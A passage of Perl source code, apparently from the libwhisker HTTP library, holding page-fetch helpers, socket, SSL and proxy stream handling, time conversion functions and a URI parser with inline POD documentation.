$rptr = \\%req;\n        http_init_request( \\%req );\n    }\n\n    my @u = uri_split( $URL, $rptr );\n    return ( undef, 'Non-HTTP URL supplied' )\n      if ( $u[1] ne 'http' && $u[1] ne 'https' );\n    http_fixup_request($rptr);\n\n    if ( http_do_request( $rptr, \\%resp ) ) {\n        return ( undef, $resp{'whisker'}->{'error'} );\n    }\n    return ( $resp{'whisker'}->{'code'}, $resp{'whisker'}->{'data'} );\n}\n\n########################################################################\n\n=item B<get_page_hash>\n\nParams: $url [, \\%request]\n\nReturn: $hash_ref (undef on no URL)\n\nThis function will fetch the page at the given URL, and return the whisker\nHTTP response hash.  The return code of the function is set to\n$hash_ref->{whisker}->{get_page_hash}, and uses the http_do_request()\nreturn values.\n\nNote: undef is returned if no URL is supplied\n\n=cut\n\nsub get_page_hash {\n    my ( $URL, $hr ) = ( shift, shift );\n    return undef if ( length($URL) == 0 );\n\n    my ( %req, %resp );\n    my $rptr;\n\n    if ( defined $hr && ref($hr) ) {\n        $rptr = $hr;\n    }\n    else {\n        $rptr = \\%req;\n        http_init_request( \\%req );\n    }\n\n    my @u = uri_split( $URL, $rptr );    # this is newer >=1.1 syntax\n    return undef if ( $u[1] ne 'http' && $u[1] ne 'https' );\n    http_fixup_request($rptr);\n\n    my $r = http_do_request( $rptr, \\%resp );\n    $resp{whisker}->{get_page_hash} = $r;\n    return \\%resp;\n}\n\n########################################################################\n\n=item B<get_page_to_file>\n\nParams: $url, $filepath [, \\%request]\n\nReturn: $code ($code will be set to undef on error)\n\nThis function will fetch the page at the given URL, place the resulting HTML\nin the file specified, and return the HTTP response code.  The optional\n%request hash sets the default parameters to be used in the request.\n\nNOTE: libwhisker does not do any file checking; libwhisker will open the\nsupplied filepath for writing, overwriting any previously-existing files.\nLibwhisker does not differentiate between a bad request, and a bad file\nopen.  If you're having troubles making this function work, make sure\nthat your $filepath is legal and valid, and that you have appropriate\nwrite permissions to create/overwrite that file.\n\n=cut\n\nsub get_page_to_file {\n    my ( $URL, $filepath, $hr ) = @_;\n\n    return undef if ( length($URL) == 0 );\n    return undef if ( length($filepath) == 0 );\n\n    my ( %req, %resp );\n    my $rptr;\n\n    if ( defined $hr && ref($hr) ) {\n        $rptr = $hr;\n    }\n    else {\n        $rptr = \\%req;\n        http_init_request( \\%req );\n    }\n\n    my @u = uri_split( $URL, $rptr );    # this is newer >=1.1 syntax\n    return undef if ( $u[1] ne 'http' && $u[1] ne 'https' );\n    http_fixup_request($rptr);\n    return undef if ( http_do_request( $rptr, \\%resp ) );\n\n    open( OUT, \">$filepath\" ) || return undef;\n    binmode(OUT);                        # stupid Windows\n    print OUT $resp{'whisker'}->{'data'};\n    close(OUT);\n\n    return $resp{'whisker'}->{'code'};\n}\n\n\n@_stream_FUNCS = (\n    [ 'open', 'close', 'read', 'write', 'writedone', 'valid' ],    # stream_NULL\n    [ 'socket', 'all', 'socket', 'socket', 'noop', 'socket' ]\n    ,    # stream_SOCKTCP   1\n    [ 'socket', 'all', 'socket', 'socket', 'noop', 'never' ]\n    ,    # stream_SOCKUDP   2\n    [ 'file', 'all', 'socket', 'file', 'noop', 'never' ],   # stream_FILE      3\n    [ 'ssl', 'all', 'ssl', 'ssl', 'noop', 'netssleay' ],    # stream_NETSSLEAY 4\n    [ 'ssl', 'all', 'ssl', 'ssl', 'noop', 'never' ],        # stream_NETSSL    5\n    [ 'buffer', 'buffer', 'buffer', 'buffer', 'noop',\n        'never' ]                                           # stream_BUFFER    6\n);\n\nsub stream_key {\n    my ( $key, $type, $wh ) = ( '', 1, shift );\n\n    if ( defined $wh->{whisker}->{UDP} && $wh->{whisker}->{UDP} > 0 ) {\n        $type = 2;\n        $key  = 'udp:';\n    }\n\n    if ( $wh->{whisker}->{ssl} > 0 ) {\n        $type = 4 if ( $LW_SSL_LIB == 1 );\n        $type = 5 if ( $LW_SSL_LIB == 2 );\n        $key = 'ssl:';\n    }\n\n    if ( defined $wh->{whisker}->{file_stream} ) {\n        $type = 3;\n        $key  = 'file=' . $wh->{whisker}->{file_stream} . ':';\n    }\n\n    if ( defined $wh->{whisker}->{buffer_stream} ) {\n        $type = 6;\n        $key  = 'buffer:';\n    }\n\n    my ( $x, $h, $p ) = (0);\n    if ( defined $wh->{whisker}->{proxy_host} ) {\n        $h = $wh->{whisker}->{proxy_host};\n        $p = $wh->{whisker}->{proxy_port} || 80;\n        $x++;\n        $key .= 'proxy:';\n        if ( $type == 5 ) {\n            $x                = 0;\n            $ENV{HTTPS_PROXY} = \"$h:$p\";\n            $h                = $wh->{whisker}->{host};\n            $p                = $wh->{whisker}->{port};\n        }\n    }\n    else {\n        $h = $wh->{whisker}->{host};\n        $p = $wh->{whisker}->{port};\n    }\n\n    $key .= $h . ':' . $p;\n    if ( defined $wh->{whisker}->{stream_num} ) {\n        $key .= '/' . $wh->{whisker}->{stream_num};\n    }\n\n    return $key if ( !wantarray() );\n    return ( $type, $h, $p, $x, $key );\n}\n\nsub stream_setsock {\n    my $fd = shift;\n    my $wh = http_new_request( host => 'localhost', port => 80, ssl => 0 );\n    my $xr = stream_new($wh);\n    return undef if ( $xr->{streamtype} != 1 );\n    $xr->{sock}  = $fd;\n    $xr->{state} = 1;\n    $xr->{eof}   = 0;\n    $xr->{clearall}->();\n    return $xr;\n}\n\n{\n    $SYMCOUNT = 0;\n\n    sub stream_new {\n        my ( $c, $rh ) = ( 0, shift );\n        my $sock = _stream_newsock();\n        my %x;\n        %x = (\n            bufin      => '',\n            bufout     => '',\n            error      => '',\n            streamtype => 0,\n            eof        => 0,\n            ctx        => undef,\n            sock       => $sock,\n            state      => 0,\n            syns       => 0,\n            reqs       => 0,\n            timeout    => $rh->{whisker}->{timeout} || 10,\n            nonblock   => 0,\n            forceclose => 0\n        );\n\n        ( $x{streamtype}, $x{chost}, $x{cport}, $x{proxy}, $x{key} ) =\n          stream_key($rh);\n        return undef if ( $x{streamtype} == 0 );\n        return undef\n          if (\n            $LW_SSL_LIB == 0\n            && (   $x{streamtype} == 4\n                || $x{streamtype} == 5 )\n          );\n        return undef\n          if ( $x{streamtype} != 3\n            && $x{streamtype} != 6\n            && !defined $Socket::VERSION );\n\n        $x{nonblock} = $LW_NONBLOCK_CONNECT if ( $x{streamtype} == 1 );\n        $x{forceclose} = 1 if ( $x{streamtype} == 5 );\n\n        $x{slurp} = $rh->{whisker}->{trailing_slurp} || 0;\n\n        my @N = @{ $_stream_FUNCS[ $x{streamtype} ] };\n        for ( $c = 0 ; $c < 6 ; $c++ ) {\n            my $n = $_stream_FUNCS[0]->[$c];\n            my $e =\n              '$x{\"' . $n . '\"}=sub{&_stream_' . $N[$c] . \"_$n\" . '(\\%x,@_)}';\n            eval \"$e\";\n        }\n        $x{queue} = sub { $x{bufout} .= shift };\n        $x{clearall} = sub { $x{bufin} = $x{bufout} = '' };\n        $x{clear} = sub { $x{bufout} = '' };\n        return bless \\%x, 'LW2::stream';\n    }\n\n    sub _stream_newsock {    # same as Symbol::gensym\n        my $pkg  = \"LW2::\";\n        my $name = \"_STREAM_\" . $SYMCOUNT++;\n        delete $$pkg{$name};\n        return \\*{ $pkg . $name };\n    }\n}\n\nsub _stream_all_close {\n    my $xr = shift;\n    $xr->{state} = 0;\n    if ( $xr->{streamtype} == 4 ) {\n        eval { $xr->{sock}->shutdown() };\n        eval { close( $xr->{origsock} ) };\n\n        #\t\teval { Net::SSLeay::free($xr->{sock}) };\n    }\n    else {\n        eval { close( $xr->{sock} ) };\n    }\n}\n\nsub _stream_never_valid {\n    return 0;\n}\n\nsub __bad_netssleay_error {\n    my $err = Net::SSLeay::ERR_get_error;\n    return 0\n      if ( $err == Net::SSLeay::ERROR_NONE\n        || $err == Net::SSLeay::ERROR_WANT_READ\n        || $err == Net::SSLeay::ERROR_WANT_WRITE );\n    return 1;\n}\n\nsub _stream_netssleay_valid {\n    my $xr = shift;\n    return 0 if ( $LW_SSL_KEEPALIVE == 0 || $xr->{state} == 0 );\n    return 0 if ( &Net::SSLeay::OPENSSL_VERSION_NUMBER < 0x0090601f );\n\n    my $lo = Net::SSLeay::pending( $xr->{sock} );\n    if ( $lo > 0 ) {    # leftover data to slurp\n        if ( !$xr->{slurp} ) {\n            return 0 if ( !_stream_ssl_read($xr) );\n        }\n        else {\n\n            # todo\n            #$xr->{slurped}.=$x.\"\\0\";\n        }\n    }\n    return 0 if ( __bad_netssleay_error() );\n\n    my ( $r, $e, $vin ) = ( undef, undef, '' );\n    my $fno = fileno( $xr->{origsock} );\n    vec( $vin, $fno, 1 ) = 1;\n    if ( select( ( $r = $vin ), undef, ( $e = $vin ), .0001 ) ) {\n        return 0 if ( vec( $e, $fno, 1 ) );\n        if ( vec( $r, $fno, 1 ) ) {    # waiting data, let's peek\n            my $temp = Net::SSLeay::peek( $xr->{sock}, 1 );\n            return 0 if ( __bad_netssleay_error() );\n            return 0 if ( $temp <= 0 );\n        }\n    }\n\n    return 1;\n}\n\nsub _stream_socket_valid {\n    my $xr = shift;\n    return 0 if ( $xr->{state} == 0 );\n    my ( $o, $vin ) = ( undef, '' );\n    vec( $vin, fileno( $xr->{sock} ), 1 ) = 1;\n    if ( select( ( $o = $vin ), undef, undef, .0001 ) ) {\n        my ( $hold, $res );\n        do {\n            $res = sysread( $xr->{sock}, $hold, 4096 );\n            return _stream_err( $xr, 1, 'is_valid sysread failed' )\n              if ( !defined $res );    # error\n            return 0 if ( $res == 0 ); # EOF\n            if ( !$xr->{slurp} ) {\n                $xr->{bufin} .= $hold;\n            }\n            else {\n                $xr->{slurped} .= $hold . \"\\0\";\n            }\n        } while ( $res && select( ( $o = $vin ), undef, undef, .0001 ) );\n    }\n    return 1;\n}\n\nsub _stream_socket_read {\n    my $xr = shift;\n    return 0 if ( $xr->{state} == 0 );\n    my ( $vin, $t ) = ( '', '' );\n    vec( $vin, fileno( $xr->{sock} ), 1 ) = 1;\n    return 0 if ( !select( $vin, undef, undef, $xr->{timeout} ) );\n    my $res = sysread( $xr->{sock}, $t, 4096 );\n    return _stream_err( $xr, 1, 'sysread failed' ) if ( !defined $res );\n    if ( $res == 0 ) {\n        $xr->{eof} = 1;\n        return 0;\n    }\n    $xr->{bufin} .= $t;\n    $xr->{eof} = 0;\n    return 1;\n}\n\nsub _stream_ssl_read {\n    my ( $xr, $t ) = ( shift, '' );\n    return 0 if ( $xr->{state} == 0 );\n    if ( $xr->{streamtype} == 4 ) {\n        local $SIG{ALRM} = sub { die \"lw_timeout\\n\" };\n        local $SIG{PIPE} = sub { die \"lw_pipe\\n\" };\n        eval {\n            eval { alarm( $xr->{timeout} ) };\n\n            #\t\t\tsleep(1) while(!Net::SSLeay::pending($xr->{sock}));\n            $t = Net::SSLeay::read( $xr->{sock} );\n            eval { alarm(0) };\n        };\n        return 0 if ( $@ || __bad_netssleay_error() || !defined $t || $t eq '' );\n    }\n    elsif ( $xr->{streamtype} == 5 ) {\n        return 0 if ( !$xr->{sock}->read( $t, 4096 ) );\n    }\n    $xr->{bufin} .= $t;\n    return 1;\n}\n\nsub _stream_noop_writedone { }\n\nsub _stream_ssl_writedone {\n    my $xr = shift;\n    if ( $xr->{streamtype} == 4 ) {    # Net::SSLeay\n        shutdown $xr->{origsock}, 1;\n    }\n    else {                             # Net::SSL\n                                       #shutdown $xr->{sock}, 1;\n    }\n}\n\nsub _stream_socket_write {\n    my ( $xr, $data, $v, $wrote ) = ( shift, shift, '', 0 );\n    return 0 if ( $xr->{state} == 0 );\n    $xr->{bufout} .= $data if ( defined $data );\n    my $len = length( $xr->{bufout} );\n    return 1 if ( $len == 0 );\n    vec( $v, fileno( $xr->{sock} ), 1 ) = 1;\n    return _stream_err( $xr, 1, 'stream write test failed' )\n      if ( !select( undef, $v, undef, .0001 ) );\n    my $piperr = 0;\n    local $SIG{PIPE} = sub { $piperr++ };\n\n    #\t$wrote=syswrite($xr->{sock},$xr->{bufout},$len);\n    #\treturn _stream_err($xr,1,'syswrite failed')\n    #\t\tif(!defined $wrote || $piperr);\n    #\t$xr->{error} = 'could not send entire queue' && return 0\n    #\t\tif($wrote!=$len);\n    #\t$xr->{bufout}='';\n    #\treturn 1;\n\n    do {\n        $wrote = syswrite( $xr->{sock}, $xr->{bufout}, $len );\n        if ( defined $wrote ) {\n            substr( $xr->{bufout}, 0, $wrote ) = '';\n        }\n        else {\n            if ( $! != EWOULDBLOCK ) {\n                $piperr++;\n            }\n            else {\n                vec( $v, fileno( $xr->{sock} ), 1 ) = 1;\n                $piperr++ if ( !select( undef, $v, undef, $xr->{timeout} ) );\n            }\n        }\n        return _stream_err( $xr, 1, 'syswrite failed' ) if ($piperr);\n        $len = length( $xr->{bufout} );\n    } while ( $len > 0 );\n    return 1;\n}\n\nsub _stream_ssl_write {\n    my ( $xr, $data, $wrote, $err ) = ( shift, shift, 0, '' );\n    return 0 if ( $xr->{state} == 0 );\n    $xr->{bufout} .= $data if ( defined $data );\n    my $len = length( $xr->{bufout} );\n    return 1 if ( $len == 0 );\n    if ( $xr->{streamtype} == 4 ) {\n        ( $wrote, $err ) =\n          Net::SSLeay::ssl_write_all( $xr->{sock}, \\$xr->{bufout} );\n        if ( __bad_netssleay_error() || !$wrote ) {\n            $xr->{error} = \"SSL error: $err\";\n            return 0;\n        }\n        if ( $wrote != $len ) {\n            $xr->{error} = 'could not send entire queue';\n            return 0;\n        }\n    }\n    elsif ( $xr->{streamtype} == 5 ) {\n        $xr->{sock}->print( $xr->{bufout} );\n\n        # bummer, no error checking?\n    }\n    $xr->{bufout} = '';\n    return 1;\n}\n\nsub _stream_socket_alloc {\n    my ( $xr, $wh ) = @_;\n\n    if ( $xr->{streamtype} == 2 ) {\n        return _stream_err( $xr, 0, 'socket problems (UDP)' )\n          if (\n            !socket(\n                $xr->{sock}, PF_INET,\n                SOCK_DGRAM, getprotobyname('udp') || 0\n            )\n          );\n    }\n    else {\n        return _stream_err( $xr, 0, 'socket() problems' )\n          if (\n            !socket(\n                $xr->{sock}, PF_INET,\n                SOCK_STREAM, getprotobyname('tcp') || 0\n            )\n          );\n    }\n\n    if ( defined $wh->{whisker}->{bind_socket} ) {\n        my $p = $wh->{whisker}->{bind_port} || '*';\n        $p =~ tr/0-9*//cd;\n        return _stream_err( $xr, 0, 'Bad bind_port value' )\n          if ( $p eq '' );\n        my $a = INADDR_ANY;\n        $a = inet_aton( $wh->{whisker}->{bind_addr} )\n          if ( defined $wh->{whisker}->{bind_addr} );\n        return _stream_err( $xr, 0, 'Bad bind_addr value' )\n          if ( !defined $a );\n        if ( $p =~ tr/*// ) {\n            for ( $p = 14011 ; $p < 65535 ; $p++ ) {\n                if ( !bind( $xr->{sock}, sockaddr_in( $p, $a ) ) ) {\n                    return _stream_err( $xr, 0, 'bind() on socket failed' )\n                      if ( $! ne 'Address already in use' );\n                }\n                else {\n                    last;\n                }\n            }\n            return _stream_err( $xr, 0, 'bind() cannot find open socket' )\n              if ( $p >= 65535 );\n        }\n        else {\n            return _stream_err( $xr, 0, 'bind() on socket failed' )\n              if ( !bind( $xr->{sock}, sockaddr_in( $p, $a ) ) );\n        }\n    }\n\n    if ( !defined $xr->{iaton} ) {\n        $xr->{iaton} = inet_aton( $xr->{chost} );\n        return _stream_err( $xr, 0, 'can\\'t resolve hostname' )\n          if ( !defined $xr->{iaton} );\n    }\n    $xr->{socket_alloc}++;\n    return 1;\n}\n\nsub _stream_socket_nonblock {\n    my ( $fl, $xr, $nonblock ) = ( 0, @_ );\n\n    if ( $^O =~ /Win32/ ) {\n        $fl = 1 if ($nonblock);\n\n        # 0x8004667e = FIONBIO in Winsock2.h\n        if ( !ioctl( $xr->{sock}, 0x8004667e, \\$fl ) ) {\n            return 0;\n        }\n    }\n    else {\n        if ( !( $fl = fcntl( $xr->{sock}, F_GETFL, 0 ) ) ) {\n            return 0;\n        }\n        $fl |= O_NONBLOCK if ($nonblock);\n        $fl &= ~O_NONBLOCK if ( !$nonblock );\n        if ( !( fcntl( $xr->{sock}, F_SETFL, $fl ) ) ) {\n            return 0;\n        }\n\n    }\n    return 1;\n}\n\nsub _stream_socket_open {\n    my ( $vin, $xr, $wh ) = ( '', @_ );\n    return 0 if ( !defined $wh );\n\n    $xr->{'close'}->() if ( $xr->{state} > 0 );\n    return 0 if ( !_stream_socket_alloc( $xr, $wh ) );\n    $xr->{timeout} = $wh->{whisker}->{timeout} || 10;\n\n    if ( $xr->{nonblock} ) {\n        if ( !_stream_socket_nonblock( $xr, 1 ) ) {\n            $xr->{nonblock} = 0;\n            $LW_NONBLOCK_CONNECT = 0;\n        }\n        else {\n            my $R =\n              connect( $xr->{sock}, sockaddr_in( $xr->{cport}, $xr->{iaton} ) );\n            if ( !$R ) {\n                return _stream_err( $xr, 1, 'can\\'t connect (connect error)' )\n                  if ( $! != EINPROGRESS && $! != EWOULDBLOCK );\n                vec( $vin, fileno( $xr->{sock} ), 1 ) = 1;\n                return _stream_err( $xr, 1, 'can\\'t connect (timeout)' )\n                  if ( !select( undef, $vin, $vin, $xr->{timeout} )\n                    || !getpeername( $xr->{sock} ) );\n            }\n\n            # leave in nonblock for normal TCP\n            #\t\t\tif($xr->{streamtype} != 1 && !_stream_socket_nonblock($xr,0)){\n            #\t\t\t\t$LW_NONBLOCK_CONNECT=0;\n            #\t\t\t\treturn _stream_err($xr,1,'setting sock to block');\n            #\t\t\t}\n        }\n    }\n\n    if ( !$xr->{nonblock} ) {\n        eval {\n            local $SIG{ALRM} = sub { die \"timeout\\n\" };\n            eval { alarm( $xr->{timeout} ) };\n            if (\n                !connect(\n                    $xr->{sock}, sockaddr_in( $xr->{cport}, $xr->{iaton} )\n                )\n              )\n            {\n                eval { alarm(0) };\n                die \"connect failed\\n\";\n            }\n            eval { alarm(0) };\n        };\n        return _stream_err( $xr, 0,\n            'can\\'t connect (' . substr( $@, 0, index( $@, \"\\n\" ) ) . ')' )\n          if ($@);\n    }\n\n    binmode( $xr->{sock} );\n    my $S = select( $xr->{sock} );\n    $|++;\n    select($S);\n    $xr->{state} = 1;\n    $xr->{syns}++;\n    return 1;\n}\n\nsub _stream_ssl_open {\n    my ( $xr, $wh ) = @_;\n    return 0         if ( !defined $wh );\n    $xr->{close}->() if ( $xr->{state} > 0 );\n    my $W = $wh->{whisker};\n\n    if ( $xr->{streamtype} == 5 ) {\n\n        # these have to always be set, to overwrite any previous\n        # set values (using ENV is a crappy way to do this)\n        $ENV{HTTPS_KEY_FILE}  = $W->{ssl_rsacertfile} || '';\n        $ENV{HTTPS_CERT_FILE} = $W->{ssl_certfile}    || '';\n\teval {\n            $xr->{sock}           = Net::SSL->new(\n                PeerAddr => $xr->{chost},\n                PeerPort => $xr->{cport},\n                Timeout  => $xr->{timeout}\n            );\n\t};\n        return _stream_err( $xr, 0, 'can\\'t connect: ' . $@ )\n\t\tif ($@ || !defined $xr->{sock});\n        $xr->{sock}->autoflush(1);\n        $xr->{state} = 1;\n\n        # Net::SSL doesn't use stream_socket_open, so fake syns\n        $xr->{syns}++;\n        return 1;\n    }\n\n    return 0 if ( $xr->{streamtype} != 4 );\n\n    # otherwise, we're stream_NETSSLEAY\n\n    if ( !defined $xr->{ctx} ) {\n        return _stream_err( $xr, 0, 'ssl ctx create' )\n          if ( !( $xr->{ctx} = Net::SSLeay::CTX_new() ) );\n        Net::SSLeay::CTX_set_options( $xr->{ctx}, &Net::SSLeay::OP_ALL );\n        if ( defined $W->{ssl_rsacertfile} ) {\n            if (\n                !(\n                    Net::SSLeay::CTX_use_RSAPrivateKey_file(\n                        $xr->{ctx}, $W->{ssl_rsacertfile},\n                        &Net::SSLeay::FILETYPE_PEM\n                    )\n                )\n              )\n            {\n                return _stream_err( $xr, 0, 'ssl ctx rsacert' );\n            }\n        }\n        if ( defined $W->{ssl_certfile} ) {\n            if (\n                !(\n                    Net::SSLeay::CTX_use_certificate_file(\n                        $xr->{ctx}, $W->{ssl_certfile},\n                        &Net::SSLeay::FILETYPE_PEM\n                    )\n                )\n              )\n            {\n                return _stream_err( $xr, 0, 'ssl ctx cert' );\n            }\n        }\n    }\n\n\t\t# just to be safe, catch any errors that didn't get returned\n\t\treturn _stream_err($xr, 0, 'ssl setup error' )\n\t\t\tif( __bad_netssleay_error() );\n\n    return _stream_err( $xr, 0, 'ssl create new' )\n      if ( !( $xr->{sslobj} = Net::SSLeay::new( $xr->{ctx} ) ) );\n    # SNI stuff\n\t Net::SSLeay::set_tlsext_host_name($xr->{sslobj}, $W->{host});\n    if ( defined $W->{ssl_ciphers} ) {\n        if (\n            !(\n                Net::SSLeay::set_cipher_list(\n                    $xr->{sslobj}, $W->{ssl_ciphers}\n                )\n            )\n          )\n        {\n            return _stream_err( $xr, 0, 'ssl set ciphers' );\n        }\n    }\n\n    # now we use a normal socket to connect\n    return 0 if ( !_stream_socket_open( $xr, $wh ) );\n    $xr->{state} = 1;\n\n    if ( $xr->{proxy} ) {\n        my $C = 'CONNECT ' . $W->{host} . ':' . $W->{port} . \" HTTP/1.0\\r\\n\";\n        $C .= 'Proxy-Authorization: ' . $wh->{'Proxy-Authorization'} . \"\\r\\n\"\n          if ( defined $wh->{'Proxy-Authorization'} );\n        $C .= \"\\r\\n\";\n\n        my $r = syswrite( $xr->{sock}, $C, length($C) );\n        return _stream_err( $xr, 1, 'sending proxy connect string' )\n          if ( !defined $r || $r != length($C) );\n\n        # now we need to read proxy response and parse it\n        do {\n            return _stream_err( $xr, 1, 'ssl proxy request failed' )\n              if ( !_stream_socket_read($xr) );\n          } while ( index( $xr->{bufin}, \"\\n\\n\" ) == -1\n            && index( $xr->{bufin}, \"\\r\\n\\r\\n\" ) == -1 );\n        return _stream_err( $xr, 1, 'proxy couldn\\'t make connection' )\n          if ( $xr->{bufin} !~ /^HTTP\\/1.[0-9]+\\W+200/ );\n\n        #$xr->{bufin}='';\n        $xr->{clearall}->();\n    }\n\n    Net::SSLeay::set_fd( $xr->{sslobj}, fileno( $xr->{sock} ) );\n    Net::SSLeay::set_session( $xr->{sslobj}, $xr->{sslsession} )\n      if ( defined $xr->{sslsession} );\n    return _stream_err( $xr, 1, 'ssl connect failed' )\n      if ( !( Net::SSLeay::connect( $xr->{sslobj} ) ) ||\n      \t__bad_netssleay_error() );\n\n    # my $x = Net::SSLeay::ctrl( $xr->{sslobj}, 6, 0, '' );\n    $xr->{sslsession} = Net::SSLeay::get_session( $xr->{sslobj} )\n      if ( defined $W->{ssl_resume} && $W->{ssl_resume} > 0 );\n\n    # little trickery to abstract/normalize stuff\n    $xr->{origsock} = $xr->{sock};\n    $xr->{sock}     = $xr->{sslobj};\n    return 1;\n}\n\nsub _stream_file_open {\n    my ( $xr, $wh ) = @_;\n    $xr->{close}->() if ( $xr->{state} > 0 );\n    my $file = $wh->{whisker}->{file_stream};\n    return _stream_err( $xr, 0, 'invalid file' )\n      if ( !-e $file || !-f $file );\n    return _stream_err( $xr, 0, 'file open failure' )\n      if ( !sysopen( $xr->{sock}, $file, 'r' ) );\n    binmode($xr->{sock}); # Stupid Windows\n    $xr->{state} = 1;\n}\n\nsub _stream_file_write {\n    my $xr = shift;\n    $xr->{bufout} = '';\n    return 1;\n}\n\nsub _stream_buffer_open {\n    my ( $xr, $wh ) = @_;\n    $xr->{close}->() if ( $xr->{state} > 0 );\n    $xr->{state} = 1;\n}\n\nsub _stream_buffer_close {\n    my $xr = shift;\n    $xr->{state} = 0;\n    $xr->{bufout} = $xr->{bufin} = '';\n}\n\nsub _stream_buffer_read {\n    my $xr = shift;\n    return 0 if ( $xr->{state} == 0 );\n    if ( length( $xr->{bufout} ) > 0 ) {\n        $xr->{bufin} .= $xr->{bufout};\n        $xr->{bufout} = '';\n    }\n    if ( length( $xr->{bufin} ) == 0 ) {\n        $xr->{eof} = 1;\n        return 0;\n    }\n    $xr->{eof} = 0;\n    return 1;\n}\n\nsub _stream_buffer_write {\n    my ( $xr, $data ) = ( shift, shift );\n    return 0 if ( $xr->{state} == 0 );\n    $xr->{bufout} .= $data if ( defined $data );\n    my $len = length( $xr->{bufout} );\n    return 1 if ( $len == 0 );\n    $xr->{bufin} .= $xr->{bufout};\n    $xr->{bufout} = '';\n    return 1;\n}\n\nsub _stream_err {\n    my ( $xr, $close, $error ) = @_;\n    $xr->{error} = $error;\n    $xr->{error} .= \": $!\" if ( defined $! && $! ne '' );\n    $xr->{'close'}->() if ($close);\n    $xr->{state} = 0;\n    return 0;\n}\n\n\n########################################################################\n\n=item B<time_mktime>\n\nParams: $seconds, $minutes, $hours, $day_of_month, $month, $year_minus_1900\n\nReturn: $seconds [ -1 on error ]\n\nPerforms a general mktime calculation with the given time components.\nNote that the input parameter values are expected to be in the format\noutput by localtime/gmtime.  Namely, $seconds is 0-60 (yes, there can\nbe a leap second value of 60 occasionally), $minutes is 0-59, $hours\nis 0-23, $days is 1-31, $month is 0-11, and $year is 70-127.  This\nfunction is limited in that it will not process dates prior to 1970 or\nafter 2037 (that way 32-bit time_t overflow calculations aren't required).\n\nAdditional parameters passed to the function are ignored, so it is\nsafe to use the full localtime/gmtime output, such as:\n\n\t$seconds = LW2::time_mktime( localtime( time ) );\n\nNote: this function does not adjust for time zone, daylight savings\ntime, etc.  You must do that yourself.\n\n=cut\n\nsub time_mktime {\n\tmy ($sec,$min,$hour,$day,$mon,$yr)=@_;\n\tmy @md=(0,31,59,90,120,151,181,212,243,273,304,334);\n\tforeach(@_[0..5]){\n\t\treturn -1 if !defined $_ || $_<0; }\n\treturn -1 if($sec>60 || $min>59 || $hour>23 || $day>31 || $mon>11\n\t\t|| $yr>137 || $yr<70);\n\t$yr += 1900;\n\tmy $res = ($yr-1970)*365+$md[$mon];\n\t$res += int(($yr-1969)/4) + int(($yr-1601)/400);\n\t$res -= int(($yr-1901)/100);\n\t$res = ($res+$day-1)*24;\n\t$res = ($res+$hour)*60;\n\t$res = ($res+$min)*60;\n\treturn $res+$sec;\n}\n\n\n=item B<time_gmtolocal>\n\nParams: $seconds_gmt\n\nReturn: $seconds_local_timezone\n\nTakes a seconds value in UTC/GMT time and adjusts it to reflect the current\ntimezone.  This function is slightly expensive; it takes the gmtime() and\nlocaltime() representations of the current time, calculates the delta\ndifference by turning them back into seconds via time_mktime, and then\napplies this delta difference to $seconds_gmt.\n\nNote that if you give this function a time and subtract the return value from\nthe original time, you will get the delta value.  At that point, you can just\napply the delta directly and skip calling this function, which is a massive\nperformance boost.  However, this will cause problems if you have a long\nrunning program which crosses daylight savings time boundaries, as the DST\nadjustment will not be accounted for unless you recalculate the new delta.\n\n=cut\n\nsub time_gmtolocal {\n\tmy $t = shift;\n\tmy $now = time;\n\tmy $utc = time_mktime(gmtime($now));\n\tmy $me = time_mktime(localtime($now));\n\treturn $t - ($utc - $me);\n}\n\n\n#################################################################\n\n=item B<uri_split>\n\nParams: $uri_string [, \\%request_hash]\n\nReturn: @uri_parts\n\nReturn an array of the following values, in order:  uri, protocol, host,\nport, params, frag, user, password.  Values not defined are given an undef\nvalue.  If a %request hash is passed in, then uri_split() will also set\nthe appropriate values in the hash.\n\nNote:  uri_split() will only set the %request hash if the protocol\nis HTTP or HTTPS!\n\n=cut\n\nsub uri_split {\n    my ( $uri, $work ) = ( shift, '', 0 );\n    my ($hr) = shift;\n\n    #       (uri,protocol,host,port,params,frag,user,pass)\n    my @res = ( undef, undef, undef, 0, undef, undef, undef, undef );\n\n    return undef if ( !defined $uri );\n\n    # remove fragments\n    ( $uri, $res[5] ) = split( '#', $uri, 2 ) if ( index( $uri, '#', 0 ) >= 0 );\n\n    # get scheme and net_loc\n    my $net_loc = undef;\n    if ( $uri =~ s/^([-+.a-z0-9A-Z]+):// ) {\n        $res[1] = lc($1);\n        if ( substr( $uri, 0, 2 ) eq '//' ) {\n            my $w = index( $uri, '/', 2 );\n            if ( $w >= 0 ) {\n                $net_loc = substr( $uri, 2, $w - 2 );\n                $uri = substr( $uri, $w, length($uri) - $w );\n            }\n            else {\n                ( $net_loc = $uri ) =~ tr#/##d;\n                $uri = '/';\n            }\n        }\n    }\n\n    # parse net_loc info\n    if ( defined $net_loc ) {\n        if ( index( $net_loc, '@', 0 ) >= 0 ) {\n            ( $res[6], $net_loc ) = split( /\\@/, $net_loc, 2 );\n            if ( index( $res[6], ':', 0 ) >= 0 ) {\n                ( $res[6], $res[7] ) = split( ':', $res[6], 2 );\n            }\n        }\n        $res[3] = $1 if ( $net_loc =~ s/:([0-9]+)$// );\n        $res[2] = $net_loc;\n    }\n\n    # remove query info\n    ( $uri, $res[4] ) = split( '\\?', $uri, 2 )\n      if ( index( $uri, '?', 0 ) >= 0 );\n\n    # whatever is left over is the uri\n    $res[0] = $uri;\n\n    if ( $res[3] == 0 && defined $res[1] ) {\n        $res[3] = 80  if ( $res[1] eq 'http' );\n        $res[3] = 443 if ( $res[1] eq 'https' );\n    }\n\n    my $rel_uri = 0;\n    $rel_uri++\n      if ( $res[3] == 0\n        && !defined $res[2]\n        && !defined $res[1]\n        && $res[0] ne '' );\n    return @res if ( $res[3] == 0 && !$rel_uri );\n\n    if ( defined $hr && ref($hr) ) {\n\n        $$hr{whisker}->{uri} = $res[0] if ( defined $res[0] );\n        if ( defined $res[4] ) {\n            $$hr{whisker}->{parameters} = $res[4];\n        }\n        else { delete $$hr{whisker}->{parameters}; }\n\n        return @res if ($rel_uri);\n\n\t\t\t\tif ( $res[1] eq 'https' ) {\n\t        $$hr{whisker}->{ssl} = 1;\n\t      } else { $$hr{whisker}->{ssl} = 0; }\n        $$hr{whisker}->{host} = $res[2] if ( defined $res[2] );\n        $$hr{whisker}->{port} = $res[3];\n\n        if ( defined $res[6] ) {\n            $$hr{whisker}->{uri_user} = $res[6];\n        }\n        else { delete $$hr{whisker}->{uri_user}; }\n        if ( defined $res[7] ) {\n            